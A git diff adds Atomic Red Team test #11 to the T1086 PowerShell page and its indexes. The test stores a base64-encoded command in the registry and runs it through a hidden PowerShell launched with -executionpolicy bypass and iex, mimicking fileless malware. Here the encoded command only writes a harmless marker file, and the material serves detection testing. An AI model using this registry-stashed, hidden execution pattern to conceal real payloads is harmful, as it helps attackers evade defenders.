diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index 48851a65..2202125a 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -42,6 +42,8 @@ Remote Support: Yes</blockquote>
 
 - [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
 
+- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
+
 
 <br/>
 
@@ -223,3 +225,17 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 
 
 <br/>
+<br/>
+
+## Atomic Test #11 - PowerShell Fileless Script Execution
+Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
+powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
+```
+<br/>
diff --git a/atomics/index.md b/atomics/index.md
index 5912a86e..d5601c1a 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -488,6 +488,7 @@
   - Atomic Test #8: Powershell XML requests [windows]
   - Atomic Test #9: Powershell invoke mshta.exe download [windows]
   - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
+  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
 - [T1121 Regsvcs/Regasm](./T1121/T1121.md)
   - Atomic Test #1: Regasm Uninstall Method Call Test [windows]
   - Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 2953ffd3..de159f00 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -398,6 +398,7 @@
   - Atomic Test #8: Powershell XML requests [windows]
   - Atomic Test #9: Powershell invoke mshta.exe download [windows]
   - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
+  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
 - [T1121 Regsvcs/Regasm](./T1121/T1121.md)
   - Atomic Test #1: Regasm Uninstall Method Call Test [windows]
   - Atomic Test #2: Regsvs Uninstall Method Call Test [windows]